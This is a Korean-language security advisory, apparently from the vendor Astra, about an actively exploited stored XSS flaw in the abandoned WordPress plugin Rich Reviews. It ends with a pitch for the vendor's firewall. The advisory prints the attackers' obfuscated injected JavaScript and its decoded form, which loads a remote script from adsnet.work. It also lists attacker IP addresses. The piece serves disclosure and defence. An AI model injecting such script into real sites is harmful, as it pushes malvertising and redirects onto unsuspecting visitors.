Computer >> 컴퓨터 >  >> 네트워킹 >> 네트워크 보안

워드프레스 '리치 리뷰(Rich Reviews)' 플러그인, 심각한 XSS 취약점으로 집중 공격받아

워드프레스 인기 플러그인 '리치 리뷰(Rich Reviews)'에서 심각한 XSS(교차 사이트 스크립팅) 취약점이 발견되었으며, 현재까지도 관련 공격이 계속되고 있습니다. 이 플러그인의 활성 설치 수는 16,000개를 넘는 것으로 추산됩니다. 다만 이번 취약점 발견 자체는 놀라운 일이 아닙니다. 해당 플러그인이 무려 2년 넘게 업데이트되지 않았기 때문입니다.

실제로 리치 리뷰는 2019년 3월 11일 워드프레스 플러그인 디렉터리에서 이미 삭제된 상태였습니다. 취약점의 영향을 받는 버전은 1.7.4 및 그 이전 버전입니다. 더욱 심각한 점은 지금까지도 패치가 배포되었다는 소식이 전혀 없다는 사실입니다.

워드프레스  리치 리뷰(Rich Reviews)  플러그인, 심각한 XSS 취약점으로 집중 공격받아

리치 리뷰 취약점 상세 내용

이번 취약점은 저장형 XSS(Stored XSS)로 분류됩니다. 이로 인해 인증되지 않은 사용자도 해당 플러그인이 설치된 모든 워드프레스 사이트에서 플러그인 옵션 업데이트 기능을 악용할 수 있습니다.

현재까지 확인된 공격 형태는 악성 광고(malvertising)입니다. 해커들은 이 취약점을 이용해 웹사이트에 악성 코드를 삽입하고, 이 코드가 팝업창이나 악성 광고를 띄우도록 만듭니다. 이러한 광고와 팝업은 방문자를 불쾌하거나 선정적인 사이트로 강제로 유도합니다.

기술적 세부 사항

이번 공격의 주된 원인은 플러그인에 접근 제어(access control) 장치가 없기 때문입니다. 여기에 더해 입력값 검증(sanitization) 규칙 역시 제대로 갖춰져 있지 않습니다.

광고 리디렉션과 팝업을 유발하는 악성 코드는 아래와 같습니다. 탐지를 피하기 위해 해커가 코드를 교묘하게 난독화(obfuscation)한 점에 주목할 필요가 있습니다.

eval(String.fromCharCode(118, 97, 114, 32, 115, 99, 114, 105, 112, 116, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 10, 115, 99, 114, 105, 112, 116, 46, 111, 110, 108, 111, 97, 100, 32, 61, 32, 102, 117, 110, 99, 116, 105, 111, 110, 40, 41, 32, 123, 10, 125, 59, 10, 115, 99, 114, 105, 112, 116, 46, 115, 114, 99, 32, 61, 32, 34, 104, 116, 116, 112, 115, 58, 47, 47, 97, 100, 115, 110, 101, 116, 46, 119, 111, 114, 107, 47, 115, 99, 114, 105, 112, 116, 115, 47, 112, 108, 97, 99, 101, 46, 106, 115, 34, 59, 10, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 39, 104, 101, 97, 100, 39, 41, 91, 48, 93, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 115, 99, 114, 105, 112, 116, 41, 59));

위 코드를 난독화 해제하면 다음과 같이 변환됩니다:

var script = document.createElement('script');

script.onload = function() {

};

script.src = "https://adsnet.work/scripts/place.js";

document.getElementsByTagName('head')[0].appendChild(script);

공격자로 확인된 IP 주소

대부분의 공격과 연관이 있는 것으로 확인된 IP 주소는 다음과 같습니다:

  • 94.229.170.38
  • 183.90.250.26
  • 69.27.116.3

또한 adsnet.work라는 도메인도 확인되었습니다. 이 IP들에서 로그인 시도가 감지되면 각별히 주의하시기 바랍니다. 사전에 이들을 차단해 웹사이트 접근 자체를 막는 것이 가장 안전한 대응 방법입니다.

감염 제거 방법

만약 불행히도 이 공격의 피해자가 되었다면 당황하지 마세요. Astra 보안 전문가에게 문의하시면 모든 문제를 신속하게 해결해 드리겠습니다.

위험 완화 방법

아직 감염되지 않은 사이트라면 늦기 전에 미리 예방 조치를 취하는 것이 중요합니다. 감염을 예방하기 위해 지금 바로 실행할 수 있는 방법들을 소개합니다.

플러그인 즉시 삭제

해당 플러그인은 이미 워드프레스 디렉터리에서 제거되었기 때문에 개발자가 업데이트 버전을 배포할 방법이 없습니다. 안전을 위해 즉시 플러그인을 삭제하는 것이 좋습니다. 게다가 개발자가 조만간 패치를 출시하겠다는 의사를 밝힌 적도 전혀 없습니다.

방화벽으로 보호

플러그인을 삭제한 후에는 유사한 공격으로부터 보호하기 위해 방화벽을 반드시 구축하세요. Astra 방화벽은 워드프레스에 최적화된 효율적인 솔루션입니다. XSS, CSRF, SQLi, 악성 봇, LFI, RFI, OWASP Top 10 등 100여 가지 이상의 사이버 공격으로부터 웹사이트를 보호합니다.

내 웹사이트 보호 요청하기